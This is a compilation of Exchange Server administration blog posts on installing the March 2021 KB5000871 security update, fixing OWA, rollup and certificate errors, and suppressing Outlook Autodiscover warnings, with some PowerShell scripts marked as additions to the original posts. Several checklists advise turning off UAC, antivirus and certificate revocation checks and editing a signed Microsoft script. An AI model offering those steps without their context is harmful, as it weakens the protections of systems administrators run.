Microsoft made it a little bit complicated today. Here is maybe some help. They adapted their blogs and documents during the day. The first answers to the early links were asking where the patches are that they mentioned.

So hopefully this information will help you to get your Exchange on premise safe soon.

 https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b

Description of the security update for Microsoft Exchange Server 2019, 2016, and 2013: March 2, 2021 (KB5000871)

     

To see what version you have, use these PowerShell commands:

Get-ExchangeServer | Format-List Name,Edition,AdminDisplayVersion

Invoke-Command -ScriptBlock {Get-Command Exsetup.exe | ForEach-Object {$_.FileversionInfo}}

Exchange Version overview:

Exchange Server – Buildnummern und Veröffentlichungstermine | Microsoft Docs

https://docs.microsoft.com/de-de/Exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019

You then see the following info:

ProductVersion FileVersion FileName

14.03.0513.000 14.03.0513.000 D:\Program Files\Microsoft\Exchange Server\V14\bin\ExSetup.exe

This changes AFTER the patch KB5000871, which makes certain Exchange versions safe. See the 15.1.2106.13: that is the Exchange 2016 CU18 we patched with KB5000871.

Screenshot: the sample shows a customer on Exchange 2016 CU18 (not yet on CU19 [not needed to be safe]), 15.01.2106.002, and we made him safe with the patch, .13 (lower line).

IMPORTANT and CONFUSING:

You have to be on a certain Patch level (Not the latest) before you can apply the Hot fix which makes you safe.

  • On 2016 and the 2019 the last two regular versions
  • On 2010 and 2013 the last version which was released

     

These are the versions you can patch with the Hotfix/Security Update for Exchange Server KB5000871:

Exchange 2019: you need at least 2019 CU7 (if you are not on CU7, first update to CU7 or later).

You don't have to update to CU8 to be safe! Just install the KB5000871 build for your CU.
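As an added example (not from the original post), here is a PowerShell function that reads the ExSetup.exe file version and tells you which of the CUs listed in this post for KB5000871 you are on, and whether the revision (the fourth number) is already above the CU's base build, as 15.1.2106.13 is after patching 2016 CU18. The CU base builds below are the ones listed in this post; the patched revisions of the other CUs are not on this page, so compare the revision you see against the KB5000871 article for your CU.

```powershell
# Added example, not from the post: classify the local ExSetup.exe version against the
# CU base builds that KB5000871 supports (build numbers taken from this post).

$KnownCuBuilds = @(
    [pscustomobject]@{ Product = 'Exchange 2019 CU8';  Base = [version]'15.2.792.3'  }
    [pscustomobject]@{ Product = 'Exchange 2019 CU7';  Base = [version]'15.2.721.2'  }
    [pscustomobject]@{ Product = 'Exchange 2016 CU19'; Base = [version]'15.1.2176.2' }
    [pscustomobject]@{ Product = 'Exchange 2016 CU18'; Base = [version]'15.1.2106.2' }
    [pscustomobject]@{ Product = 'Exchange 2013 CU23'; Base = [version]'15.0.1497.2' }
)

function Get-ExchangeCuStatus {
    param(
        # Path of ExSetup.exe; on an Exchange server it is on the PATH, as the post's command shows
        [string]$ExSetupPath = (Get-Command Exsetup.exe -ErrorAction Stop).Path
    )
    # "15.01.2106.002" from FileVersionInfo parses to 15.1.2106.2 with the [version] cast
    $fileVersion = [version](Get-Item $ExSetupPath).VersionInfo.FileVersion

    # A CU is identified by major.minor.build; the revision (4th part) grows with each security update
    $cu = $KnownCuBuilds | Where-Object {
        $_.Base.Major -eq $fileVersion.Major -and
        $_.Base.Minor -eq $fileVersion.Minor -and
        $_.Base.Build -eq $fileVersion.Build
    }

    [pscustomobject]@{
        FileVersion       = $fileVersion
        MatchedCu         = if ($cu) { $cu.Product } else { 'not a CU listed for KB5000871' }
        SupportedByKB     = [bool]$cu
        # $true means some update (e.g. KB5000871) already sits on top of the CU base build;
        # check the exact revision against the KB article, it is only known here for 2016 CU18 (13)
        RevisionAboveBase = if ($cu) { $fileVersion.Revision -gt $cu.Base.Revision } else { $false }
    }
}

Get-ExchangeCuStatus | Format-List
```

On the 2010 server from the output above (14.03.0513.000) this reports "not a CU listed for KB5000871", which is correct: Exchange 2010 gets Rollup 32 instead, as described further down.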

     

Exchange Server 2019 CU8    December 15, 2020    15.2.792.3        15.02.0792.003

https://www.microsoft.com/en-us/download/details.aspx?id=102770 (KB5000871 Download link)

     

Exchange Server 2019 CU7    September 15, 2020    15.2.721.2        15.02.0721.002

https://www.microsoft.com/en-us/download/details.aspx?id=102771 (KB5000871 Download link)

     

If you are not on CU7 or CU8, install one of those first and then KB5000871 afterwards to be safe.

Check whether you need Enterprise Admin/Schema Admin to install CU7 and CU8 (don't install with delegated admin accounts!)

Reminder: most modern rollups/CUs for Exchange a) save the config to many XML files, b) do a complete uninstall of the full Exchange and c) re-install the full Exchange with the settings from the XML files (do not interrupt, wait until it's done!). If it fails you will see services deactivated and Exchange missing!

Exchange 2016: you need at least 2016 CU18 (if you are not on CU18, first update to CU18 or later).

You don't have to update to CU19 to be safe! Just install the KB5000871 build for your CU.

     

     

Exchange Server 2016 CU19 December 15, 2020 15.1.2176.2     15.01.2176.002

https://www.microsoft.com/en-us/download/details.aspx?id=102772 (KB5000871 Download link)

     

Exchange Server 2016 CU18 September 15, 2020 15.1.2106.2     15.01.2106.002

https://www.microsoft.com/en-us/download/details.aspx?id=102773 (KB5000871 Download link)

     

If you are not on CU18 or CU19, install one of those first and then KB5000871 afterwards to be safe.

Both CU18 and CU19 may make Active Directory schema updates, so you need to be Domain Admin and Enterprise/Schema Admin! The patch itself can be installed with regular permissions.

Reminder: most modern rollups/CUs for Exchange a) save the config to many XML files, b) do a complete uninstall of the full Exchange and c) re-install the full Exchange with the settings from the XML files (do not interrupt, wait until it's done!). If it fails you will see services deactivated and Exchange missing!

Exchange 2013: there is only one hotfix, for CU23, which came out a year ago.

     

Exchange Server 2013 CU23    June 18, 2019        15.0.1497.2        15.00.1497.002

https://www.microsoft.com/en-us/download/details.aspx?id=102775 (KB5000871 Download link)

     

If you are not on CU23, install CU23 first and then KB5000871 afterwards to be safe.

Reminder: most modern rollups/CUs for Exchange a) save the config to many XML files, b) do a complete uninstall of the full Exchange and c) re-install the full Exchange with the settings from the XML files (do not interrupt, wait until it's done!)

Exchange 2010: there is a new Rollup 32, free to all customers. Install RU32 and you are good. It came out today and includes all you need.

Exchange Server 2010 SP3 Rollup 32 (released today, 03.03.2021; you can install it without ESU)

https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2010-service-pack-3-march-2-2021-kb5000978-894f27bf-281e-44f8-b9ba-dad705534459

 https://www.microsoft.com/en-us/download/details.aspx?id=102774 (KB5000871 Download link)

     

     

Install the MSP patch and the CU/Rollup the right way, so that you get more information (a log) if something goes wrong:

* Check: PowerShell execution policy adjusted? get-executionpolicy –list

* Check: UAC OFF

* Run it elevated or it will not work

* Stop scheduled things like backups, NetApp snapshots, Veeam tasks and maybe the antivirus solution

* Make a link to cmd.exe on your desktop and run that elevated

* From that cmd.exe navigate to the patch and run it, for example: Exchange2016-KB5000871-x64-de.msp /lvx C:\KB5000871_InstallationLogFile.log

     

     

Or with a batch file. It's the same thing; what's important is that you install the patch only elevated, with "Run as Administrator".

:: ExchangeServer2016-x64-CU18_HOTFIX
:: V1.0, 03.03.2021, M. Butsch, First Release
:: -----------------------------------------------------------------------------------------------------------------------
cls
@echo off
echo ACHTUNG auf GPO's fuer Powershell oder UAC ACHTUNG
echo -----------------------------------------------------------------------
echo - Execution Policy Powrshell angepasst? get-executionpolicy -list
echo - revoke Cert IE angepasst?
echo - UAC abgestellt
echo -----------------------------------------------------------------------
pause
C:\edv\ExchangeServer2016-x64-CU18_HOTFIX\Exchange2016-KB5000871-x64-de.msp /lvx C:\edv\ExchangeServer2016-x64-CU18_HOTFIX\KB5000871_InstallationLogFile.log
pause
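The same checklist as a PowerShell script, as an added example that is not from the original post: it checks elevation, UAC (EnableLUA) and the execution policy, runs the .msp through msiexec.exe with the same /lvx logging switch, and returns the installer's exit code. The .msp and log paths are placeholders; C:\ExchangeSetupLogs is Exchange's own setup log folder, which the script scans for [ERROR] when the exit code is not 0, since the MSI return code alone says little when the rollup runs many PowerShell scripts.

```powershell
# Added example, not from the post: pre-flight checks, patch installation with a verbose
# log, and a scan of the Exchange setup logs if msiexec reports a failure.

function Test-PatchPrerequisites {
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = [Security.Principal.WindowsPrincipal]$identity
    $elevated  = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

    # EnableLUA = 0 means UAC is off (what the checklist asks for); 1 means UAC is on
    $uac = (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System').EnableLUA

    $policy = Get-ExecutionPolicy -List
    [pscustomobject]@{
        Elevated        = $elevated
        UacEnabled      = ($uac -ne 0)
        ExecutionPolicy = ($policy | ForEach-Object { "$($_.Scope)=$($_.ExecutionPolicy)" }) -join ', '
    }
}

function Install-ExchangeMsp {
    param(
        [Parameter(Mandatory)][string]$Msp,   # placeholder path to the KB5000871 .msp
        [Parameter(Mandatory)][string]$Log    # placeholder path for the verbose log
    )
    $pre = Test-PatchPrerequisites
    if (-not $pre.Elevated) { throw 'Run this from an elevated session (Run as Administrator).' }
    if ($pre.UacEnabled)    { Write-Warning 'UAC is still enabled; the checklist above wants it off for the installation.' }
    Write-Host "Execution policy: $($pre.ExecutionPolicy)"

    # /p applies a patch package; /lvx is the same verbose+debug log switch the post uses
    $proc = Start-Process -FilePath 'msiexec.exe' -ArgumentList "/p `"$Msp`" /lvx `"$Log`"" -Wait -PassThru
    return $proc.ExitCode
}

function Find-ExchangeSetupErrors {
    param([string]$LogFolder = 'C:\ExchangeSetupLogs')
    # Select-String is case-insensitive, so both [ERROR] and [Error] lines are found
    Get-ChildItem -Path $LogFolder -Filter *.log -Recurse -ErrorAction SilentlyContinue |
        Select-String -Pattern '\[ERROR\]' |
        Select-Object Path, LineNumber, Line
}

$exit = Install-ExchangeMsp -Msp 'C:\edv\Exchange2016-KB5000871-x64-de.msp' -Log 'C:\edv\KB5000871_InstallationLogFile.log'
if ($exit -eq 0) {
    Write-Host 'Patch installed; check services and the build number afterwards'
} else {
    # 1603 = fatal error during installation, 3010 = success but reboot required
    Write-Warning "msiexec returned $exit; scanning Exchange setup logs for [ERROR]"
    Find-ExchangeSetupErrors | Format-Table -AutoSize -Wrap
}
```

Running the .msp via msiexec.exe rather than by double-clicking gives you the exit code in the script, which is what you need to decide whether to look at the logs at all.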

   

Tags:

Exchange 2010 | Exchange 2013 | Exchange 2016

Error: “Exchange OWA HTTP500 Internal Server Error” after OWA Logon

by butsch 4. February 2021 15:57

 

Error: "Exchange OWA HTTP500 Internal Server Error" after OWA logon

You see the logon screen of Exchange OWA and log on with valid credentials. After logon you receive a website error:

Solution/Reason/Source: the service "Microsoft Exchange Forms-Based Authentication Service" is not started or has crashed.

 

This was hard to find since it sat behind a KEMP load balancer and happened during a 2010 to 2016 migration, but it is indeed very simple: the service "Microsoft Exchange Forms-Based Authentication Service" was not started on one CAS behind the KEMP. Depending on how thorough your KEMP health checks are, the load balancer fails over to the other CAS or it does not.

When you search for routes, ciphers and everything else, you tend to forget simple things like services.

We found a lot of blogs mentioning that this was solved and related to the VM running the CAS having too little RAM. Either check all services after a reboot with a script, or give it more RAM. ;-)
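An added example of such a script (not the post's own): it lists every MSExchange* service that is set to Automatic but not running, on each CAS behind the load balancer. The server names are placeholders; MSExchangeFBA is the service name of "Microsoft Exchange Forms-Based Authentication Service" as assumed here, and Get-Service -ComputerName is Windows PowerShell 5.1 syntax (the Exchange Management Shell), since that parameter no longer exists in PowerShell 7.

```powershell
# Added example, not from the post: find automatic MSExchange* services that did not
# come up after a reboot, on every CAS, and restart the FBA service behind the OWA 500.

function Get-StoppedExchangeServices {
    param([string]$ComputerName = $env:COMPUTERNAME)
    # Windows PowerShell 5.1: ServiceController objects carry StartType and a remote binding
    Get-Service -ComputerName $ComputerName -Name 'MSExchange*' |
        Where-Object { $_.StartType -eq 'Automatic' -and $_.Status -ne 'Running' }
}

$casServers = 'CAS01', 'CAS02'   # placeholder host names
$stopped = foreach ($cas in $casServers) { Get-StoppedExchangeServices -ComputerName $cas }

if (-not $stopped) {
    Write-Host 'All automatic MSExchange* services are running on all CAS'
} else {
    $stopped | Select-Object MachineName, Name, DisplayName, Status | Format-Table -AutoSize
    # MSExchangeFBA (assumed service name) is the Forms-Based Authentication service
    # whose absence produced the HTTP 500 after OWA logon in this post
    $stopped | Where-Object Name -eq 'MSExchangeFBA' | Start-Service
}
```

Run it from an account with service-control rights on the CAS servers; a load balancer health check that only probes TCP 443 will not notice that FBA is down, which is why a service check like this belongs in the post-reboot routine.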

 

 

If this does not solve it, please also see:

Exchange 2013 Troubleshooting: Error 500 when login ECP and OWA - TechNet Articles - United States (English) - TechNet Wiki (microsoft.com)

https://social.technet.microsoft.com/wiki/contents/articles/34020.exchange-2013-troubleshooting-error-500-when-login-ecp-and-owa.aspx

Recycle the app pool in IIS

OR

  1. Go to the RUN window and type "ADSIEDIT.msc"
  2. After opening ADSIEDIT, go to the Action menu, choose "Connect to" and then select
    1. "Select a well known Naming Context"
  3. Select Configuration and click OK.
  4. Go to CN=Configuration, then CN=Services, then CN=Microsoft Exchange, then CN=Your DOMAIN Name and navigate to CN=Client Access
  5. Right-click CN=Client Access and click Properties. Scroll down to look for the values:
    1. msExchCanaryData0
    2. msExchCanaryData1
    3. msExchCanaryData2
    4. msExchCanaryData3
  6. Take a backup to be safe and clear all these values to <not set>. If the values are already <not set>, then try Solution 1 (recycle the app pool).
  7. Open IIS Manager on your CAS server, go to "Application Pools", right-click MSExchangeOWAAppPool and click Recycle.

Tags:

Exchange 2010 | Exchange 2013 | Exchange 2016

Exchange 2010 SP3 RU28/29/30 ended prematurely (Management Framework 3.0 on Server)

by butsch 30. September 2020 21:25

Server 2008 R2, Exchange 2010 SP3 with Rollup 27 installed, 2x DAG mailbox servers (NetApp SnapManager for Exchange 7.2.1); the CAS servers all upgraded fine to RU30.

This KB is all about a built-in Exchange 2010 PowerShell script from Microsoft in which they complain about or wonder at PowerShell from Microsoft. A finally statement has the following comment:

"Curious PS behavior: It appears that 'return' trumps 'throw', so don't return..."

 

What we try to do:

We install RU28/29 or 30 on Exchange 2010 SP3 with some "world famous" NetApp software for Exchange backup (SnapManager) or some NetApp partner tool.

Because it's "freaky", the NetApp people install Microsoft Management Framework 3.0 or 4.0, so they have a little plug-in somewhere or can freak around with PowerShell to show off their skills to other people. Because their football-field-sized compatibility matrix says they have to upgrade, they update.

So the real problem is the Management Framework 3.0 or 4.0 installed by some NetApp software or a partner plug-in from a NetApp company.

 

This is what happens:

Regular approved setup, elevated, no services that needed to be stopped, execution policy allowing unsigned scripts.

Error:

Setup Wizard for Update Rollup for Exchange Server 2010 Service Pack 3 ended prematurely because of an error. Your system has not been modified. To install this program at a later time, please run the installation again.

 

Event 1023, Msiinstaller, Application, Update Rollup

 

As always you did check:

  • The account you update with is not some locked-down admin.s / admin.c user which has no schema or AD permissions
  • Set-ExecutionPolicy Unrestricted
  • Disabled the certificate revocation check in IE/Edge > Options
  • Made a cmd.exe shortcut on the desktop and ran that ELEVATED (Run as Administrator)
  • Briefly disabled AV, even if it's McAfee ENS ;-)

But that was not the error here…

 

Try to re-run it with the logging option so you see more:

D:\edv\RU30\Exchange2010-KB4536989-x64-en.msp /lvx D:\edv\RU30\RU30_InstallationLogFile.log

Also check everything under C:\ExchangeSetupLogs\*.log

 

Logfile Debug:

MSI (c) (C4:C8) [21:28:16:082]: Product: Microsoft Exchange Server - Update 'Update Rollup 30 for Exchange Server 2010 Service Pack 3 (KB4536989) 14.3.496.0' could not be installed. Error code 1603. Additional information is available in the log file D:\edv\Exchange_2010_SP3_ROLLUP_30\RU30_InstallationLogFile.log.

 

MSI (c) (C4:C8) [21:28:16:082]: Windows Installer installed an update. Product Name: Microsoft Exchange Server. Product Version: 14.3.123.4. Product Language: 1033. Manufacturer: Microsoft Corporation. Update Name: Update Rollup 30 for Exchange Server 2010 Service Pack 3 (KB4536989) 14.3.496.0. Installation success or error status: 1603.

MSI (c) (C4:C8) [21:28:16:113]: MainEngineThread is returning 1603

 

Remark Butsch:

 

The returned MSI error normally helps if the MSI just copied a few files and registry keys. If the MSI starts a hundred PowerShell scripts and one of them fails, the error code means almost nothing. That's like triggering a start.cmd which calls a start.bat which calls a start.vbs, and somewhere you should capture an %errorlevel%.

Let's search for [ERROR] in all Exchange logs, for example under c:\exchangesetuplogs\*.log

Check the logfile C:\ExchangeSetupLogs\ServiceControl.log for [ERROR]:

 

[20:18:24] [Error] System.Management.Automation.ParseException: At D:\Program Files\Microsoft\Exchange Server\V14\Scripts\ManageScheduledTask.ps1:462 char:5

+ return $success

 

Solution 1:

Microsoft recommends to UNINSTALL Management Framework 3.0 or 4.0 > install the Rollup > RE-install Management Framework 3.0 or 4.0 and pray.

Solution 2:

Just give the service pack RU (the PowerShell script) what it wants: a return value $success. ;-) As you can guess, this is not officially supported, says the guy who wrote the comments in the PS code. It's really at the beginning, when the rollup checks services, checks that PowerShell runs etc.

Back up the file, then modify ManageScheduledTask.ps1 from "D:\Program Files\Microsoft\Exchange Server\V14\Scripts" at line 462.

Change line 462 from "Return $success" to "# Return $success"

Just put the # and a space in front of it (comment it out).

OR this worked too…

Change the line "Return $success" to "Write-Output $success"
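An added example (not from the post) that performs the first variant safely: it backs up ManageScheduledTask.ps1 and comments out line 462 only if that line really reads return $success; anything else aborts without touching the file, so a different script revision is not damaged. The path and line number are the ones from this post and are parameters.

```powershell
# Added example, not from the post: back up the script and comment out the single
# 'return $success' line, refusing to edit if the line is not what we expect.

function Disable-ReturnLine {
    param(
        [string]$Path = 'D:\Program Files\Microsoft\Exchange Server\V14\Scripts\ManageScheduledTask.ps1',
        [int]$LineNumber = 462,
        [string]$Expected = 'return $success'   # single quotes: $success is literal here
    )
    $lines = [System.IO.File]::ReadAllLines($Path)
    if ($LineNumber -gt $lines.Count) { throw "$Path has only $($lines.Count) lines" }

    $idx     = $LineNumber - 1
    $current = $lines[$idx]

    # idempotent: a second run finds the commented line and does nothing
    if ($current.Trim() -eq "# $Expected") {
        Write-Host "Line $LineNumber is already commented out; nothing to do"
        return $false
    }
    # PowerShell's -ne is case-insensitive, so 'Return $success' also matches
    if ($current.Trim() -ne $Expected) {
        throw "Line $LineNumber is '$current', not '$Expected'; refusing to edit"
    }

    $backup = "$Path.$(Get-Date -Format 'yyyyMMdd-HHmmss').bak"
    Copy-Item -Path $Path -Destination $backup

    # keep the original indentation and prepend '# ' as the post describes
    $indent      = $current.Substring(0, $current.Length - $current.TrimStart().Length)
    $lines[$idx] = "$indent# $($current.TrimStart())"
    [System.IO.File]::WriteAllLines($Path, $lines)

    Write-Host "Backup written to $backup; line $LineNumber commented out"
    return $true
}

Disable-ReturnLine
```

Editing the file invalidates Microsoft's Authenticode signature on the script, which is why the execution policy has to allow unsigned scripts for the rollup to run afterwards (the post sets it to Unrestricted). Restore the .bak once the rollup is through if you want the signed original back.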

 

The comments speak for themselves in this Microsoft script. Microsoft about Microsoft ;-)

Tags:

Exchange 2016 | Exchange 2010 | Exchange 2013

How to turn off Autodiscover Warning in Outlook 2010, 2013, 2016, 2019

by butsch 25. September 2020 00:35

How to turn off Autodiscover Warning in Outlook 2010/2013/2016/2019 (Exchange 2010/2013/2016)

Warnung: Das Konto wurde fuer die Einstellung auf die Website umgeleitet

https://support.microsoft.com/en-us/help/2480582/how-to-suppress-the-autodiscover-redirect-warning-in-outlook

A little bit more explained than in the Microsoft KB, and with a check that sets the registry key ONLY if that Office version is installed. During migrations you could otherwise run into trouble if this key re-applies just when you migrate to the next Office version.

This comes after you have done split DNS and integrated Autodiscover like you should.

http://www.butsch.ch/post/Exchange-200720102013-with-SPLIT-DNS-and-ONE-single-Certificate.aspx

 

We have:

Autodiscover.butsch.ch    (Exchange Server Autodiscover DNS entries)

mail.butsch.ch (Exchange Server)

This is what we don't want:

Make a new GPO policy:

 

Registry Keys:

"Software\Microsoft\Office\14.0\Outlook\AutoDiscover\RedirectServers" (Office 2010)

"Software\Microsoft\Office\15.0\Outlook\AutoDiscover\RedirectServers" (Office 2013)

"Software\Microsoft\Office\16.0\Outlook\AutoDiscover\RedirectServers" (Office 2016)

Office 97 - 7.0

Office 98 - 8.0

Office 2000 - 9.0

Office XP - 10.0

Office 2003 - 11.0

Office 2007 - 12.0

Office 2010 - 14.0 (sic!)

Office 2013 - 15.0

Office 2016 - 16.0

Office 2019 - 16.0 (sic!)
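As an added example (not from the post or the Microsoft KB), a PowerShell script that writes the RedirectServers key only for the Outlook version actually installed on the machine. The "is it installed" check is my own approach: it resolves outlook.exe through the App Paths registry entry and takes the file's major version (14, 15 or 16, matching the table above, where 2019 also reports 16.0). Host names are the post's own examples; under the RedirectServers key each redirect host is one REG_SZ value whose name is the host and whose data stays empty, as the KB describes.

```powershell
# Added example, not from the post: suppress the Autodiscover redirect warning for the
# installed Outlook version only, by writing the per-user RedirectServers key.

$RedirectHosts = 'autodiscover.butsch.ch', 'mail.butsch.ch'   # hosts from this post

function Get-InstalledOutlookVersion {
    # App Paths\OUTLOOK.EXE points at the installed outlook.exe (my assumption for
    # "Office is installed"); file major version 14 = 2010, 15 = 2013, 16 = 2016/2019
    $appPath = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE'
    if (-not (Test-Path $appPath)) { return $null }
    $exe = (Get-ItemProperty -Path $appPath).'(default)'
    if (-not ($exe -and (Test-Path $exe))) { return $null }
    $major = (Get-Item $exe).VersionInfo.FileMajorPart
    return "$major.0"
}

function Set-AutodiscoverRedirectServers {
    param([string[]]$Hosts = $RedirectHosts)
    $version = Get-InstalledOutlookVersion
    if (-not $version) {
        Write-Warning 'No Outlook installation found; not writing any RedirectServers key'
        return $null
    }
    # Same key as in the list above, for the version that is really present
    $key = "HKCU:\Software\Microsoft\Office\$version\Outlook\AutoDiscover\RedirectServers"
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    foreach ($h in $Hosts) {
        # value name = redirect host, type REG_SZ, data empty
        New-ItemProperty -Path $key -Name $h -Value '' -PropertyType String -Force | Out-Null
    }
    Get-ItemProperty -Path $key | Select-Object -Property $Hosts
}

Set-AutodiscoverRedirectServers
```

Run as a user logon script (the key is under HKCU); in a GPO you get the same effect with a Registry preference item plus item-level targeting on the Outlook version. Only list hosts you control, because every host in this key is one for which Outlook will silently follow an Autodiscover redirect without asking the user.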

 

Tags:

Exchange 2016 | Exchange 2013 | Exchange 2010

McAfee Security for Exchange 8.6, Display Bug warning Dat out of date

by butsch 1. September 2020 19:38

EPO integrated McAfee Security for Exchange 8.6 SP2

If you have a fully integrated McAfee Security for Exchange where you manage POLICY and SETTINGS from the EPO (not on the Exchange itself),

you may see an error in the GUI saying "Your Anti-Virus DAT may be out of DATE".

That is just a warning; if you check the DAT, it's fine and up to date.

The DAT update button in the GUI on the Exchange itself does not seem to update.

The server actually has the latest DAT. As an example, on the left side below you see 9730, which is the DAT from 31.08.2020.

The update function just does not understand that the server received the DAT from the EPO instead of from the WAN.

Exchange servers behind load balancers like Kemp or F5 often have limited WAN internet access.

Some Tips:

  • On smaller Exchange setups > sometimes you can solve this by changing the schedule, e.g. from 08:00 to 08:01 (just add a minute), and updating > maybe fine
  • If not behind a load balancer > you may have to check the WAN access from the Exchange server and whether it can get the DAT from McAfee
  • If you download the DAT manually from McAfee and try to install it, you will see that you already have the newest version.

Screenshot from 1. September 2020

Check in EPO under Products

If you can't get it to work for whatever reason, PUSH the DAT from McAfee EPO directly to the Exchange server where McAfee Security for Exchange runs. The error in the GUI will stay.

Tags:

Exchange 2016 | Exchange 2013 | Exchange 2010 | Microsoft Exchange | Mcafee ENS, EPO, DLP, TIE, ATD, VSE, MSME

Exchange Wildcard Certificate imported Powershell without password option (PrivateKeyMissing)

by butsch 28. August 2018 19:31

Valid for Exchange 2010/2013/2016

Problem:

You can IMPORT a password-protected (key file) Exchange certificate via PowerShell without giving the password. The import itself does work and the certificate is there, but it is NOT usable by Exchange and not visible in PowerShell (Get-ExchangeCertificate) or in the Exchange console under Certificates.

Import-ExchangeCertificate
   -Instance <String[]>
   [-Confirm]
   [-DomainController <Fqdn>]
   [-FriendlyName <String>]
   [-Password <SecureString>]
   [-PrivateKeyExportable <$true | $false>]
   [-Server <ServerIdParameter>]
   [-WhatIf]
   [<CommonParameters>]

 

What you did:

You used PowerShell to import a valid WILDCARD certificate into Exchange without the password option. If you do this in the GUI (console) you have to enter the password if the certificate is protected.

  • The newly imported wildcard does not show up under Get-ExchangeCertificate | fl
  • You are UNABLE to remove the invalid certificate with Remove-ExchangeCertificate –Thumbprint, error: (PrivateKeyMissing)
  • You do NOT see the new cert in the GUI under Server in the Exchange console

Remove-exchangecertificate -thumbprint E409F4412C605F44296957CD654EE45522EEC481

The certificate with thumbprint E409F4412C605F44296957CD654EE45522EEC481 was found but is not valid for use with Exchange Server (reason: PrivateKeyMissing).

If you TRY to reimport the same certificate with the GUI, you get:

Already exists

Solution:

Open MMC and add the Certificates snap-in:

  • COMPUTER (computer account)
  • LOCAL COMPUTER
  • PERSONAL > CERTIFICATES

 

(Be sure that you're using the Certificates snap-in for the Local Computer account!)

Check if you find any new certificates WITHOUT the golden key on the left side of the icon. These are the imported certs where the PRIVATE KEY is missing.

Delete that certificate if you are sure it's the one you just imported with the Exchange PowerShell before.

SOLVED – reimport the Exchange wildcard certificate with the CORRECT options and the key file (password) in PowerShell, or simply use the Exchange console GUI to import the wildcard and enter the password there.
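An added example (not the post's own code) of the same procedure in the Exchange Management Shell: it first lists every certificate in the local computer's Personal store that has no private key (the "no golden key" case), then shows the re-import with the PFX password supplied, and finally checks that Exchange now sees the private key. The PFX path is a placeholder; the -FileData/-Password form of Import-ExchangeCertificate is the one from Microsoft's own documentation and is used here instead of the -Instance parameter shown in the syntax above.

```powershell
# Added example, not from the post: find key-less certificates, then re-import the
# wildcard PFX with its password and verify the private key is present for Exchange.

function Get-CertsWithoutPrivateKey {
    # These are the ones that show no golden key in the MMC and cause PrivateKeyMissing
    Get-ChildItem -Path Cert:\LocalMachine\My |
        Where-Object { -not $_.HasPrivateKey } |
        Select-Object Subject, NotAfter, Thumbprint
}

# 1. Inspect the broken import(s) and remove the one you just imported by thumbprint
Get-CertsWithoutPrivateKey | Format-Table -AutoSize
# Remove-Item -Path 'Cert:\LocalMachine\My\<THUMBPRINT-OF-THE-KEYLESS-IMPORT>'   # only after checking

# 2. Re-import WITH the password (prompted, so it never sits in the script or the history)
$pfxPath  = 'C:\edv\wildcard_butsch_ch.pfx'   # placeholder
$password = Read-Host -Prompt 'PFX password' -AsSecureString
$cert = Import-ExchangeCertificate `
    -FileData ([byte[]](Get-Content -Path $pfxPath -Encoding Byte -ReadCount 0)) `
    -Password $password `
    -PrivateKeyExportable $true

# 3. Verify: HasPrivateKey must be True, otherwise Exchange cannot use the certificate
Get-ExchangeCertificate -Thumbprint $cert.Thumbprint | Format-List Subject, HasPrivateKey, NotAfter, Services
```

Once HasPrivateKey is True you can bind it with Enable-ExchangeCertificate -Services as usual; the check in step 3 is the quick way to tell a correct import from the key-less one described above.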

 

Please see our important links regarding the handling of Exchange certificates and errors:

http://www.butsch.ch/post/Exchange-20102013-POP-or-IMAP-with-Wildcard-Certificate-activation.aspx

  • Check that you import the INTERMEDIATE certificate from your cert provider
  • Make sure your Exchange VLAN can reach the internet and the certificate revocation addresses (here is how to check those etc.)

http://www.butsch.ch/post/The-certificate-is-invalid-for-exchange-server-usage-Exchange-2010-SANUC.aspx

http://www.butsch.ch/post/Generate-SAN-UC-Certificate-SSL-on-Exchange-2010.aspx 

http://www.butsch.ch/post/Exchange-2010-Certificate-stays-in-PENDING-REQUEST-after-import.aspx

Exchange with Wildcard and POP3 / IMAP

http://www.butsch.ch/post/Exchange-20102013-POP-or-IMAP-with-Wildcard-Certificate-activation.aspx

 

 

Tags:

Exchange 2010 | Exchange 2013 | Exchange 2016


